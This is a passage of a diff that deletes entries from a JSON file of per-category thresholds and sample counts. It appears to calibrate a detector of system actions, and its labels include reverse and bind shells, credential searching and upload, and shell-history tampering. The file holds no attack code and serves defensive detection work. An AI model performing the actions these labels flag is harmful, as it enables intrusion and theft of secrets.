"tp_samples": 133
|
| 1093 |
-
},
|
| 1094 |
-
"modify_language_dependency": {
|
| 1095 |
-
"threshold": 0.6477,
|
| 1096 |
-
"tp_p50": 0.7255,
|
| 1097 |
-
"tp_samples": 242
|
| 1098 |
-
},
|
| 1099 |
-
"modify_library_preload": {
|
| 1100 |
-
"threshold": 0.7431,
|
| 1101 |
-
"tp_p50": 0.8485,
|
| 1102 |
-
"tp_samples": 127
|
| 1103 |
-
},
|
| 1104 |
-
"modify_mail_queue": {
|
| 1105 |
-
"threshold": 0.7433,
|
| 1106 |
-
"tp_p50": 0.7864,
|
| 1107 |
-
"tp_samples": 112
|
| 1108 |
-
},
|
| 1109 |
-
"modify_mount_state": {
|
| 1110 |
-
"threshold": 0.6737,
|
| 1111 |
-
"tp_p50": 0.8142,
|
| 1112 |
-
"tp_samples": 192
|
| 1113 |
-
},
|
| 1114 |
-
"modify_object_storage": {
|
| 1115 |
-
"threshold": 0.6752,
|
| 1116 |
-
"tp_p50": 0.7456,
|
| 1117 |
-
"tp_samples": 138
|
| 1118 |
-
},
|
| 1119 |
-
"modify_package_execution_hook": {
|
| 1120 |
-
"threshold": 0.6732,
|
| 1121 |
-
"tp_p50": 0.7588,
|
| 1122 |
-
"tp_samples": 129
|
| 1123 |
-
},
|
| 1124 |
-
"modify_pam_policy": {
|
| 1125 |
-
"threshold": 0.6691,
|
| 1126 |
-
"tp_p50": 0.8023,
|
| 1127 |
-
"tp_samples": 121
|
| 1128 |
-
},
|
| 1129 |
-
"modify_process_memory": {
|
| 1130 |
-
"threshold": 0.689,
|
| 1131 |
-
"tp_p50": 0.779,
|
| 1132 |
-
"tp_samples": 113
|
| 1133 |
-
},
|
| 1134 |
-
"modify_process_runtime_attributes": {
|
| 1135 |
-
"threshold": 0.5753,
|
| 1136 |
-
"tp_p50": 0.6802,
|
| 1137 |
-
"tp_samples": 267
|
| 1138 |
-
},
|
| 1139 |
-
"modify_repository_hook": {
|
| 1140 |
-
"threshold": 0.6592,
|
| 1141 |
-
"tp_p50": 0.7283,
|
| 1142 |
-
"tp_samples": 122
|
| 1143 |
-
},
|
| 1144 |
-
"modify_route": {
|
| 1145 |
-
"threshold": 0.6932,
|
| 1146 |
-
"tp_p50": 0.7889,
|
| 1147 |
-
"tp_samples": 209
|
| 1148 |
-
},
|
| 1149 |
-
"modify_scheduled_task": {
|
| 1150 |
-
"threshold": 0.6497,
|
| 1151 |
-
"tp_p50": 0.7293,
|
| 1152 |
-
"tp_samples": 232
|
| 1153 |
-
},
|
| 1154 |
-
"modify_security_module_policy": {
|
| 1155 |
-
"threshold": 0.6747,
|
| 1156 |
-
"tp_p50": 0.7325,
|
| 1157 |
-
"tp_samples": 114
|
| 1158 |
-
},
|
| 1159 |
-
"modify_service_state": {
|
| 1160 |
-
"threshold": 0.54,
|
| 1161 |
-
"tp_p50": 0.6781,
|
| 1162 |
-
"tp_samples": 1459
|
| 1163 |
-
},
|
| 1164 |
-
"modify_shell_history": {
|
| 1165 |
-
"threshold": 0.6489,
|
| 1166 |
-
"tp_p50": 0.7942,
|
| 1167 |
-
"tp_samples": 121
|
| 1168 |
-
},
|
| 1169 |
-
"modify_shell_startup": {
|
| 1170 |
-
"threshold": 0.6464,
|
| 1171 |
-
"tp_p50": 0.7481,
|
| 1172 |
-
"tp_samples": 112
|
| 1173 |
-
},
|
| 1174 |
-
"modify_source_code": {
|
| 1175 |
-
"threshold": 0.6366,
|
| 1176 |
-
"tp_p50": 0.7607,
|
| 1177 |
-
"tp_samples": 297
|
| 1178 |
-
},
|
| 1179 |
-
"modify_source_repository": {
|
| 1180 |
-
"threshold": 0.6355,
|
| 1181 |
-
"tp_p50": 0.7734,
|
| 1182 |
-
"tp_samples": 241
|
| 1183 |
-
},
|
| 1184 |
-
"modify_ssh_authorization": {
|
| 1185 |
-
"threshold": 0.5857,
|
| 1186 |
-
"tp_p50": 0.691,
|
| 1187 |
-
"tp_samples": 165
|
| 1188 |
-
},
|
| 1189 |
-
"modify_ssh_policy": {
|
| 1190 |
-
"threshold": 0.6132,
|
| 1191 |
-
"tp_p50": 0.7817,
|
| 1192 |
-
"tp_samples": 143
|
| 1193 |
-
},
|
| 1194 |
-
"modify_startup_script": {
|
| 1195 |
-
"threshold": 0.7247,
|
| 1196 |
-
"tp_p50": 0.7841,
|
| 1197 |
-
"tp_samples": 109
|
| 1198 |
-
},
|
| 1199 |
-
"modify_storage_volume": {
|
| 1200 |
-
"threshold": 0.638,
|
| 1201 |
-
"tp_p50": 0.7401,
|
| 1202 |
-
"tp_samples": 337
|
| 1203 |
-
},
|
| 1204 |
-
"modify_sudo_policy": {
|
| 1205 |
-
"threshold": 0.6521,
|
| 1206 |
-
"tp_p50": 0.785,
|
| 1207 |
-
"tp_samples": 155
|
| 1208 |
-
},
|
| 1209 |
-
"modify_swap_state": {
|
| 1210 |
-
"threshold": 0.7065,
|
| 1211 |
-
"tp_p50": 0.8236,
|
| 1212 |
-
"tp_samples": 119
|
| 1213 |
-
},
|
| 1214 |
-
"modify_symlink": {
|
| 1215 |
-
"threshold": 0.6241,
|
| 1216 |
-
"tp_p50": 0.7017,
|
| 1217 |
-
"tp_samples": 162
|
| 1218 |
-
},
|
| 1219 |
-
"modify_system_config": {
|
| 1220 |
-
"threshold": 0.6712,
|
| 1221 |
-
"tp_p50": 0.7702,
|
| 1222 |
-
"tp_samples": 317
|
| 1223 |
-
},
|
| 1224 |
-
"modify_system_time": {
|
| 1225 |
-
"threshold": 0.7395,
|
| 1226 |
-
"tp_p50": 0.8093,
|
| 1227 |
-
"tp_samples": 125
|
| 1228 |
-
},
|
| 1229 |
-
"modify_systemd_unit": {
|
| 1230 |
-
"threshold": 0.6609,
|
| 1231 |
-
"tp_p50": 0.7728,
|
| 1232 |
-
"tp_samples": 111
|
| 1233 |
-
},
|
| 1234 |
-
"modify_trust_store": {
|
| 1235 |
-
"threshold": 0.6749,
|
| 1236 |
-
"tp_p50": 0.7347,
|
| 1237 |
-
"tp_samples": 137
|
| 1238 |
-
},
|
| 1239 |
-
"modify_user_access_state": {
|
| 1240 |
-
"threshold": 0.6771,
|
| 1241 |
-
"tp_p50": 0.7416,
|
| 1242 |
-
"tp_samples": 207
|
| 1243 |
-
},
|
| 1244 |
-
"modify_user_identity": {
|
| 1245 |
-
"threshold": 0.668,
|
| 1246 |
-
"tp_p50": 0.7582,
|
| 1247 |
-
"tp_samples": 105
|
| 1248 |
-
},
|
| 1249 |
-
"modify_verification_material": {
|
| 1250 |
-
"threshold": 0.5682,
|
| 1251 |
-
"tp_p50": 0.6479,
|
| 1252 |
-
"tp_samples": 252
|
| 1253 |
-
},
|
| 1254 |
-
"modify_workload": {
|
| 1255 |
-
"threshold": 0.6247,
|
| 1256 |
-
"tp_p50": 0.7595,
|
| 1257 |
-
"tp_samples": 753
|
| 1258 |
-
},
|
| 1259 |
-
"mount_host_into_container": {
|
| 1260 |
-
"threshold": 0.5725,
|
| 1261 |
-
"tp_p50": 0.6343,
|
| 1262 |
-
"tp_samples": 161
|
| 1263 |
-
},
|
| 1264 |
-
"mount_remote_filesystem": {
|
| 1265 |
-
"threshold": 0.7129,
|
| 1266 |
-
"tp_p50": 0.8175,
|
| 1267 |
-
"tp_samples": 129
|
| 1268 |
-
},
|
| 1269 |
-
"open_data_service_session": {
|
| 1270 |
-
"threshold": 0.6567,
|
| 1271 |
-
"tp_p50": 0.7699,
|
| 1272 |
-
"tp_samples": 231
|
| 1273 |
-
},
|
| 1274 |
-
"perform_dns_zone_transfer": {
|
| 1275 |
-
"threshold": 0.6909,
|
| 1276 |
-
"tp_p50": 0.7905,
|
| 1277 |
-
"tp_samples": 115
|
| 1278 |
-
},
|
| 1279 |
-
"plan_infrastructure_template": {
|
| 1280 |
-
"threshold": 0.6305,
|
| 1281 |
-
"tp_p50": 0.7397,
|
| 1282 |
-
"tp_samples": 440
|
| 1283 |
-
},
|
| 1284 |
-
"port_forward_workload": {
|
| 1285 |
-
"threshold": 0.6883,
|
| 1286 |
-
"tp_p50": 0.8361,
|
| 1287 |
-
"tp_samples": 157
|
| 1288 |
-
},
|
| 1289 |
-
"probe_database_service": {
|
| 1290 |
-
"threshold": 0.6405,
|
| 1291 |
-
"tp_p50": 0.7953,
|
| 1292 |
-
"tp_samples": 415
|
| 1293 |
-
},
|
| 1294 |
-
"probe_multiple_endpoints": {
|
| 1295 |
-
"threshold": 0.6461,
|
| 1296 |
-
"tp_p50": 0.8002,
|
| 1297 |
-
"tp_samples": 197
|
| 1298 |
-
},
|
| 1299 |
-
"probe_multiple_endpoints_multiple_ports": {
|
| 1300 |
-
"threshold": 0.717,
|
| 1301 |
-
"tp_p50": 0.8362,
|
| 1302 |
-
"tp_samples": 272
|
| 1303 |
-
},
|
| 1304 |
-
"probe_multiple_endpoints_single_port": {
|
| 1305 |
-
"threshold": 0.6594,
|
| 1306 |
-
"tp_p50": 0.765,
|
| 1307 |
-
"tp_samples": 191
|
| 1308 |
-
},
|
| 1309 |
-
"probe_remote_access_service": {
|
| 1310 |
-
"threshold": 0.6128,
|
| 1311 |
-
"tp_p50": 0.7295,
|
| 1312 |
-
"tp_samples": 243
|
| 1313 |
-
},
|
| 1314 |
-
"probe_single_endpoint": {
|
| 1315 |
-
"threshold": 0.7619,
|
| 1316 |
-
"tp_p50": 0.8343,
|
| 1317 |
-
"tp_samples": 457
|
| 1318 |
-
},
|
| 1319 |
-
"probe_single_endpoint_multiple_ports": {
|
| 1320 |
-
"threshold": 0.6794,
|
| 1321 |
-
"tp_p50": 0.7742,
|
| 1322 |
-
"tp_samples": 274
|
| 1323 |
-
},
|
| 1324 |
-
"probe_single_endpoint_single_port": {
|
| 1325 |
-
"threshold": 0.6609,
|
| 1326 |
-
"tp_p50": 0.76,
|
| 1327 |
-
"tp_samples": 354
|
| 1328 |
-
},
|
| 1329 |
-
"probe_web_application": {
|
| 1330 |
-
"threshold": 0.6143,
|
| 1331 |
-
"tp_p50": 0.7352,
|
| 1332 |
-
"tp_samples": 598
|
| 1333 |
-
},
|
| 1334 |
-
"publish_message": {
|
| 1335 |
-
"threshold": 0.6201,
|
| 1336 |
-
"tp_p50": 0.7342,
|
| 1337 |
-
"tp_samples": 171
|
| 1338 |
-
},
|
| 1339 |
-
"publish_source_repository": {
|
| 1340 |
-
"threshold": 0.6537,
|
| 1341 |
-
"tp_p50": 0.789,
|
| 1342 |
-
"tp_samples": 121
|
| 1343 |
-
},
|
| 1344 |
-
"query_cache_data": {
|
| 1345 |
-
"threshold": 0.6533,
|
| 1346 |
-
"tp_p50": 0.7578,
|
| 1347 |
-
"tp_samples": 168
|
| 1348 |
-
},
|
| 1349 |
-
"query_cloud_audit": {
|
| 1350 |
-
"threshold": 0.7376,
|
| 1351 |
-
"tp_p50": 0.8044,
|
| 1352 |
-
"tp_samples": 173
|
| 1353 |
-
},
|
| 1354 |
-
"query_cloud_database": {
|
| 1355 |
-
"threshold": 0.781,
|
| 1356 |
-
"tp_p50": 0.8224,
|
| 1357 |
-
"tp_samples": 104
|
| 1358 |
-
},
|
| 1359 |
-
"query_database_data": {
|
| 1360 |
-
"threshold": 0.6365,
|
| 1361 |
-
"tp_p50": 0.7773,
|
| 1362 |
-
"tp_samples": 725
|
| 1363 |
-
},
|
| 1364 |
-
"query_dns_records": {
|
| 1365 |
-
"threshold": 0.7176,
|
| 1366 |
-
"tp_p50": 0.8202,
|
| 1367 |
-
"tp_samples": 695
|
| 1368 |
-
},
|
| 1369 |
-
"query_service_health": {
|
| 1370 |
-
"threshold": 0.5815,
|
| 1371 |
-
"tp_p50": 0.7661,
|
| 1372 |
-
"tp_samples": 1155
|
| 1373 |
-
},
|
| 1374 |
-
"read_auth_audit_log": {
|
| 1375 |
-
"threshold": 0.5815,
|
| 1376 |
-
"tp_p50": 0.7166,
|
| 1377 |
-
"tp_samples": 401
|
| 1378 |
-
},
|
| 1379 |
-
"read_auth_policy": {
|
| 1380 |
-
"threshold": 0.5913,
|
| 1381 |
-
"tp_p50": 0.708,
|
| 1382 |
-
"tp_samples": 255
|
| 1383 |
-
},
|
| 1384 |
-
"read_business_config": {
|
| 1385 |
-
"threshold": 0.573,
|
| 1386 |
-
"tp_p50": 0.7066,
|
| 1387 |
-
"tp_samples": 556
|
| 1388 |
-
},
|
| 1389 |
-
"read_business_data": {
|
| 1390 |
-
"threshold": 0.5044,
|
| 1391 |
-
"tp_p50": 0.5981,
|
| 1392 |
-
"tp_samples": 1378
|
| 1393 |
-
},
|
| 1394 |
-
"read_business_log": {
|
| 1395 |
-
"threshold": 0.593,
|
| 1396 |
-
"tp_p50": 0.8009,
|
| 1397 |
-
"tp_samples": 662
|
| 1398 |
-
},
|
| 1399 |
-
"read_cloud_credentials": {
|
| 1400 |
-
"threshold": 0.5766,
|
| 1401 |
-
"tp_p50": 0.6589,
|
| 1402 |
-
"tp_samples": 199
|
| 1403 |
-
},
|
| 1404 |
-
"read_cloud_metadata": {
|
| 1405 |
-
"threshold": 0.6711,
|
| 1406 |
-
"tp_p50": 0.7561,
|
| 1407 |
-
"tp_samples": 121
|
| 1408 |
-
},
|
| 1409 |
-
"read_cloud_secret": {
|
| 1410 |
-
"threshold": 0.6307,
|
| 1411 |
-
"tp_p50": 0.824,
|
| 1412 |
-
"tp_samples": 189
|
| 1413 |
-
},
|
| 1414 |
-
"read_cluster_context": {
|
| 1415 |
-
"threshold": 0.5555,
|
| 1416 |
-
"tp_p50": 0.6431,
|
| 1417 |
-
"tp_samples": 186
|
| 1418 |
-
},
|
| 1419 |
-
"read_cluster_secret": {
|
| 1420 |
-
"threshold": 0.612,
|
| 1421 |
-
"tp_p50": 0.8,
|
| 1422 |
-
"tp_samples": 197
|
| 1423 |
-
},
|
| 1424 |
-
"read_container_secret": {
|
| 1425 |
-
"threshold": 0.5712,
|
| 1426 |
-
"tp_p50": 0.6793,
|
| 1427 |
-
"tp_samples": 180
|
| 1428 |
-
},
|
| 1429 |
-
"read_coordination_data": {
|
| 1430 |
-
"threshold": 0.7039,
|
| 1431 |
-
"tp_p50": 0.7474,
|
| 1432 |
-
"tp_samples": 158
|
| 1433 |
-
},
|
| 1434 |
-
"read_credential_material": {
|
| 1435 |
-
"threshold": 0.45,
|
| 1436 |
-
"tp_p50": 0.539,
|
| 1437 |
-
"tp_samples": 4514
|
| 1438 |
-
},
|
| 1439 |
-
"read_environment_variables": {
|
| 1440 |
-
"threshold": 0.5342,
|
| 1441 |
-
"tp_p50": 0.6371,
|
| 1442 |
-
"tp_samples": 452
|
| 1443 |
-
},
|
| 1444 |
-
"read_identity_data": {
|
| 1445 |
-
"threshold": 0.5427,
|
| 1446 |
-
"tp_p50": 0.6972,
|
| 1447 |
-
"tp_samples": 836
|
| 1448 |
-
},
|
| 1449 |
-
"read_infrastructure_config": {
|
| 1450 |
-
"threshold": 0.4802,
|
| 1451 |
-
"tp_p50": 0.597,
|
| 1452 |
-
"tp_samples": 3428
|
| 1453 |
-
},
|
| 1454 |
-
"read_infrastructure_log": {
|
| 1455 |
-
"threshold": 0.5814,
|
| 1456 |
-
"tp_p50": 0.7718,
|
| 1457 |
-
"tp_samples": 863
|
| 1458 |
-
},
|
| 1459 |
-
"read_kernel_memory": {
|
| 1460 |
-
"threshold": 0.6746,
|
| 1461 |
-
"tp_p50": 0.7444,
|
| 1462 |
-
"tp_samples": 106
|
| 1463 |
-
},
|
| 1464 |
-
"read_kernel_parameter": {
|
| 1465 |
-
"threshold": 0.7379,
|
| 1466 |
-
"tp_p50": 0.8214,
|
| 1467 |
-
"tp_samples": 128
|
| 1468 |
-
},
|
| 1469 |
-
"read_kernel_state": {
|
| 1470 |
-
"threshold": 0.6215,
|
| 1471 |
-
"tp_p50": 0.7531,
|
| 1472 |
-
"tp_samples": 214
|
| 1473 |
-
},
|
| 1474 |
-
"read_login_history": {
|
| 1475 |
-
"threshold": 0.6663,
|
| 1476 |
-
"tp_p50": 0.8171,
|
| 1477 |
-
"tp_samples": 245
|
| 1478 |
-
},
|
| 1479 |
-
"read_mailbox": {
|
| 1480 |
-
"threshold": 0.6736,
|
| 1481 |
-
"tp_p50": 0.7956,
|
| 1482 |
-
"tp_samples": 126
|
| 1483 |
-
},
|
| 1484 |
-
"read_packet_capture": {
|
| 1485 |
-
"threshold": 0.6958,
|
| 1486 |
-
"tp_p50": 0.7678,
|
| 1487 |
-
"tp_samples": 173
|
| 1488 |
-
},
|
| 1489 |
-
"read_process_memory": {
|
| 1490 |
-
"threshold": 0.5784,
|
| 1491 |
-
"tp_p50": 0.6404,
|
| 1492 |
-
"tp_samples": 236
|
| 1493 |
-
},
|
| 1494 |
-
"read_process_runtime": {
|
| 1495 |
-
"threshold": 0.6308,
|
| 1496 |
-
"tp_p50": 0.7139,
|
| 1497 |
-
"tp_samples": 82
|
| 1498 |
-
},
|
| 1499 |
-
"read_scheduled_task": {
|
| 1500 |
-
"threshold": 0.596,
|
| 1501 |
-
"tp_p50": 0.7036,
|
| 1502 |
-
"tp_samples": 410
|
| 1503 |
-
},
|
| 1504 |
-
"read_secret_store": {
|
| 1505 |
-
"threshold": 0.6412,
|
| 1506 |
-
"tp_p50": 0.7354,
|
| 1507 |
-
"tp_samples": 217
|
| 1508 |
-
},
|
| 1509 |
-
"read_service_metrics": {
|
| 1510 |
-
"threshold": 0.6333,
|
| 1511 |
-
"tp_p50": 0.7737,
|
| 1512 |
-
"tp_samples": 858
|
| 1513 |
-
},
|
| 1514 |
-
"read_shell_history": {
|
| 1515 |
-
"threshold": 0.6107,
|
| 1516 |
-
"tp_p50": 0.7245,
|
| 1517 |
-
"tp_samples": 215
|
| 1518 |
-
},
|
| 1519 |
-
"read_source_code": {
|
| 1520 |
-
"threshold": 0.549,
|
| 1521 |
-
"tp_p50": 0.6913,
|
| 1522 |
-
"tp_samples": 1112
|
| 1523 |
-
},
|
| 1524 |
-
"read_source_repository": {
|
| 1525 |
-
"threshold": 0.601,
|
| 1526 |
-
"tp_p50": 0.7912,
|
| 1527 |
-
"tp_samples": 469
|
| 1528 |
-
},
|
| 1529 |
-
"read_ssh_policy": {
|
| 1530 |
-
"threshold": 0.5349,
|
| 1531 |
-
"tp_p50": 0.6313,
|
| 1532 |
-
"tp_samples": 479
|
| 1533 |
-
},
|
| 1534 |
-
"read_sudo_policy": {
|
| 1535 |
-
"threshold": 0.6356,
|
| 1536 |
-
"tp_p50": 0.7335,
|
| 1537 |
-
"tp_samples": 264
|
| 1538 |
-
},
|
| 1539 |
-
"read_system_audit_log": {
|
| 1540 |
-
"threshold": 0.6108,
|
| 1541 |
-
"tp_p50": 0.7247,
|
| 1542 |
-
"tp_samples": 215
|
| 1543 |
-
},
|
| 1544 |
-
"read_system_config": {
|
| 1545 |
-
"threshold": 0.5395,
|
| 1546 |
-
"tp_p50": 0.6907,
|
| 1547 |
-
"tp_samples": 557
|
| 1548 |
-
},
|
| 1549 |
-
"read_system_log": {
|
| 1550 |
-
"threshold": 0.5752,
|
| 1551 |
-
"tp_p50": 0.7797,
|
| 1552 |
-
"tp_samples": 455
|
| 1553 |
-
},
|
| 1554 |
-
"read_verification_material": {
|
| 1555 |
-
"threshold": 0.5356,
|
| 1556 |
-
"tp_p50": 0.686,
|
| 1557 |
-
"tp_samples": 713
|
| 1558 |
-
},
|
| 1559 |
-
"read_workload_logs": {
|
| 1560 |
-
"threshold": 0.6746,
|
| 1561 |
-
"tp_p50": 0.8214,
|
| 1562 |
-
"tp_samples": 474
|
| 1563 |
-
},
|
| 1564 |
-
"reboot_host": {
|
| 1565 |
-
"threshold": 0.6714,
|
| 1566 |
-
"tp_p50": 0.7429,
|
| 1567 |
-
"tp_samples": 122
|
| 1568 |
-
},
|
| 1569 |
-
"recover_deleted_content": {
|
| 1570 |
-
"threshold": 0.6919,
|
| 1571 |
-
"tp_p50": 0.7543,
|
| 1572 |
-
"tp_samples": 111
|
| 1573 |
-
},
|
| 1574 |
-
"remove_file_capability": {
|
| 1575 |
-
"threshold": 0.8531,
|
| 1576 |
-
"tp_p50": 0.8878,
|
| 1577 |
-
"tp_samples": 105
|
| 1578 |
-
},
|
| 1579 |
-
"remove_immutable_file_attribute": {
|
| 1580 |
-
"threshold": 0.7735,
|
| 1581 |
-
"tp_p50": 0.8178,
|
| 1582 |
-
"tp_samples": 110
|
| 1583 |
-
},
|
| 1584 |
-
"renew_access_token": {
|
| 1585 |
-
"threshold": 0.6825,
|
| 1586 |
-
"tp_p50": 0.7983,
|
| 1587 |
-
"tp_samples": 104
|
| 1588 |
-
},
|
| 1589 |
-
"resize_filesystem": {
|
| 1590 |
-
"threshold": 0.745,
|
| 1591 |
-
"tp_p50": 0.8272,
|
| 1592 |
-
"tp_samples": 111
|
| 1593 |
-
},
|
| 1594 |
-
"revoke_access_token": {
|
| 1595 |
-
"threshold": 0.6846,
|
| 1596 |
-
"tp_p50": 0.7537,
|
| 1597 |
-
"tp_samples": 112
|
| 1598 |
-
},
|
| 1599 |
-
"revoke_cloud_privilege": {
|
| 1600 |
-
"threshold": 0.7746,
|
| 1601 |
-
"tp_p50": 0.836,
|
| 1602 |
-
"tp_samples": 126
|
| 1603 |
-
},
|
| 1604 |
-
"revoke_database_privilege": {
|
| 1605 |
-
"threshold": 0.7833,
|
| 1606 |
-
"tp_p50": 0.8434,
|
| 1607 |
-
"tp_samples": 114
|
| 1608 |
-
},
|
| 1609 |
-
"revoke_infrastructure_privilege": {
|
| 1610 |
-
"threshold": 0.7092,
|
| 1611 |
-
"tp_p50": 0.8013,
|
| 1612 |
-
"tp_samples": 104
|
| 1613 |
-
},
|
| 1614 |
-
"revoke_user_privilege": {
|
| 1615 |
-
"threshold": 0.8201,
|
| 1616 |
-
"tp_p50": 0.8396,
|
| 1617 |
-
"tp_samples": 105
|
| 1618 |
-
},
|
| 1619 |
-
"run_performance_test": {
|
| 1620 |
-
"threshold": 0.6329,
|
| 1621 |
-
"tp_p50": 0.747,
|
| 1622 |
-
"tp_samples": 251
|
| 1623 |
-
},
|
| 1624 |
-
"scan_container_image": {
|
| 1625 |
-
"threshold": 0.6877,
|
| 1626 |
-
"tp_p50": 0.7855,
|
| 1627 |
-
"tp_samples": 157
|
| 1628 |
-
},
|
| 1629 |
-
"search_capability_files": {
|
| 1630 |
-
"threshold": 0.7841,
|
| 1631 |
-
"tp_p50": 0.8165,
|
| 1632 |
-
"tp_samples": 118
|
| 1633 |
-
},
|
| 1634 |
-
"search_credentials": {
|
| 1635 |
-
"threshold": 0.5261,
|
| 1636 |
-
"tp_p50": 0.6297,
|
| 1637 |
-
"tp_samples": 1488
|
| 1638 |
-
},
|
| 1639 |
-
"search_sensitive_files": {
|
| 1640 |
-
"threshold": 0.629,
|
| 1641 |
-
"tp_p50": 0.7257,
|
| 1642 |
-
"tp_samples": 224
|
| 1643 |
-
},
|
| 1644 |
-
"search_sgid_files": {
|
| 1645 |
-
"threshold": 0.7293,
|
| 1646 |
-
"tp_p50": 0.7849,
|
| 1647 |
-
"tp_samples": 108
|
| 1648 |
-
},
|
| 1649 |
-
"search_suid_files": {
|
| 1650 |
-
"threshold": 0.7008,
|
| 1651 |
-
"tp_p50": 0.7931,
|
| 1652 |
-
"tp_samples": 131
|
| 1653 |
-
},
|
| 1654 |
-
"search_world_writable_files": {
|
| 1655 |
-
"threshold": 0.7411,
|
| 1656 |
-
"tp_p50": 0.7918,
|
| 1657 |
-
"tp_samples": 120
|
| 1658 |
-
},
|
| 1659 |
-
"securely_delete_data": {
|
| 1660 |
-
"threshold": 0.6477,
|
| 1661 |
-
"tp_p50": 0.7378,
|
| 1662 |
-
"tp_samples": 163
|
| 1663 |
-
},
|
| 1664 |
-
"send_mail": {
|
| 1665 |
-
"threshold": 0.6474,
|
| 1666 |
-
"tp_p50": 0.7676,
|
| 1667 |
-
"tp_samples": 119
|
| 1668 |
-
},
|
| 1669 |
-
"send_multiplexer_input": {
|
| 1670 |
-
"threshold": 0.7005,
|
| 1671 |
-
"tp_p50": 0.7629,
|
| 1672 |
-
"tp_samples": 104
|
| 1673 |
-
},
|
| 1674 |
-
"set_environment_variable": {
|
| 1675 |
-
"threshold": 0.5429,
|
| 1676 |
-
"tp_p50": 0.6587,
|
| 1677 |
-
"tp_samples": 379
|
| 1678 |
-
},
|
| 1679 |
-
"set_file_capability": {
|
| 1680 |
-
"threshold": 0.7549,
|
| 1681 |
-
"tp_p50": 0.8531,
|
| 1682 |
-
"tp_samples": 118
|
| 1683 |
-
},
|
| 1684 |
-
"set_immutable_file_attribute": {
|
| 1685 |
-
"threshold": 0.7521,
|
| 1686 |
-
"tp_p50": 0.8391,
|
| 1687 |
-
"tp_samples": 124
|
| 1688 |
-
},
|
| 1689 |
-
"set_sgid_permission": {
|
| 1690 |
-
"threshold": 0.7021,
|
| 1691 |
-
"tp_p50": 0.8087,
|
| 1692 |
-
"tp_samples": 106
|
| 1693 |
-
},
|
| 1694 |
-
"set_suid_permission": {
|
| 1695 |
-
"threshold": 0.6472,
|
| 1696 |
-
"tp_p50": 0.8004,
|
| 1697 |
-
"tp_samples": 136
|
| 1698 |
-
},
|
| 1699 |
-
"shutdown_host": {
|
| 1700 |
-
"threshold": 0.7429,
|
| 1701 |
-
"tp_p50": 0.8095,
|
| 1702 |
-
"tp_samples": 101
|
| 1703 |
-
},
|
| 1704 |
-
"sign_artifact": {
|
| 1705 |
-
"threshold": 0.6007,
|
| 1706 |
-
"tp_p50": 0.7622,
|
| 1707 |
-
"tp_samples": 194
|
| 1708 |
-
},
|
| 1709 |
-
"simulate_package_install": {
|
| 1710 |
-
"threshold": 0.6904,
|
| 1711 |
-
"tp_p50": 0.7734,
|
| 1712 |
-
"tp_samples": 119
|
| 1713 |
-
},
|
| 1714 |
-
"spawn_bind_shell": {
|
| 1715 |
-
"threshold": 0.6993,
|
| 1716 |
-
"tp_p50": 0.7846,
|
| 1717 |
-
"tp_samples": 141
|
| 1718 |
-
},
|
| 1719 |
-
"spawn_interactive_shell": {
|
| 1720 |
-
"threshold": 0.6019,
|
| 1721 |
-
"tp_p50": 0.7026,
|
| 1722 |
-
"tp_samples": 323
|
| 1723 |
-
},
|
| 1724 |
-
"spawn_reverse_shell": {
|
| 1725 |
-
"threshold": 0.6407,
|
| 1726 |
-
"tp_p50": 0.762,
|
| 1727 |
-
"tp_samples": 157
|
| 1728 |
-
},
|
| 1729 |
-
"stage_hidden_path": {
|
| 1730 |
-
"threshold": 0.475,
|
| 1731 |
-
"tp_p50": 0.5506,
|
| 1732 |
-
"tp_samples": 1580
|
| 1733 |
-
},
|
| 1734 |
-
"stage_temporary_path": {
|
| 1735 |
-
"threshold": 0.45,
|
| 1736 |
-
"tp_p50": 0.5089,
|
| 1737 |
-
"tp_samples": 5179
|
| 1738 |
-
},
|
| 1739 |
-
"switch_user": {
|
| 1740 |
-
"threshold": 0.6584,
|
| 1741 |
-
"tp_p50": 0.832,
|
| 1742 |
-
"tp_samples": 103
|
| 1743 |
-
},
|
| 1744 |
-
"synchronize_remote_data": {
|
| 1745 |
-
"threshold": 0.5402,
|
| 1746 |
-
"tp_p50": 0.6308,
|
| 1747 |
-
"tp_samples": 641
|
| 1748 |
-
},
|
| 1749 |
-
"terminate_process": {
|
| 1750 |
-
"threshold": 0.6858,
|
| 1751 |
-
"tp_p50": 0.8069,
|
| 1752 |
-
"tp_samples": 286
|
| 1753 |
-
},
|
| 1754 |
-
"trace_file_access": {
|
| 1755 |
-
"threshold": 0.6703,
|
| 1756 |
-
"tp_p50": 0.7392,
|
| 1757 |
-
"tp_samples": 125
|
| 1758 |
-
},
|
| 1759 |
-
"trace_process_execution": {
|
| 1760 |
-
"threshold": 0.595,
|
| 1761 |
-
"tp_p50": 0.6884,
|
| 1762 |
-
"tp_samples": 246
|
| 1763 |
-
},
|
| 1764 |
-
"train_mail_filter": {
|
| 1765 |
-
"threshold": 0.7662,
|
| 1766 |
-
"tp_p50": 0.8258,
|
| 1767 |
-
"tp_samples": 108
|
| 1768 |
-
},
|
| 1769 |
-
"transfer_container_image": {
|
| 1770 |
-
"threshold": 0.6308,
|
| 1771 |
-
"tp_p50": 0.7484,
|
| 1772 |
-
"tp_samples": 360
|
| 1773 |
-
},
|
| 1774 |
-
"uninstall_package": {
|
| 1775 |
-
"threshold": 0.7557,
|
| 1776 |
-
"tp_p50": 0.8029,
|
| 1777 |
-
"tp_samples": 140
|
| 1778 |
-
},
|
| 1779 |
-
"unload_ebpf_program": {
|
| 1780 |
-
"threshold": 0.7393,
|
| 1781 |
-
"tp_p50": 0.7854,
|
| 1782 |
-
"tp_samples": 106
|
| 1783 |
-
},
|
| 1784 |
-
"unload_kernel_module": {
|
| 1785 |
-
"threshold": 0.7794,
|
| 1786 |
-
"tp_p50": 0.855,
|
| 1787 |
-
"tp_samples": 112
|
| 1788 |
-
},
|
| 1789 |
-
"update_package": {
|
| 1790 |
-
"threshold": 0.6416,
|
| 1791 |
-
"tp_p50": 0.7497,
|
| 1792 |
-
"tp_samples": 187
|
| 1793 |
-
},
|
| 1794 |
-
"update_source_repository": {
|
| 1795 |
-
"threshold": 0.6496,
|
| 1796 |
-
"tp_p50": 0.7976,
|
| 1797 |
-
"tp_samples": 261
|
| 1798 |
-
},
|
| 1799 |
-
"upload_credential_material": {
|
| 1800 |
-
"threshold": 0.5148,
|
| 1801 |
-
"tp_p50": 0.6378,
|
| 1802 |
-
"tp_samples": 607
|
| 1803 |
-
},
|
| 1804 |
-
"upload_external_content": {
|
| 1805 |
-
"threshold": 0.4733,
|
| 1806 |
-
"tp_p50": 0.6018,
|
| 1807 |
-
"tp_samples": 1886
|
| 1808 |
-
},
|
| 1809 |
-
"upload_internal_content": {
|
| 1810 |
-
"threshold": 0.5028,
|
| 1811 |
-
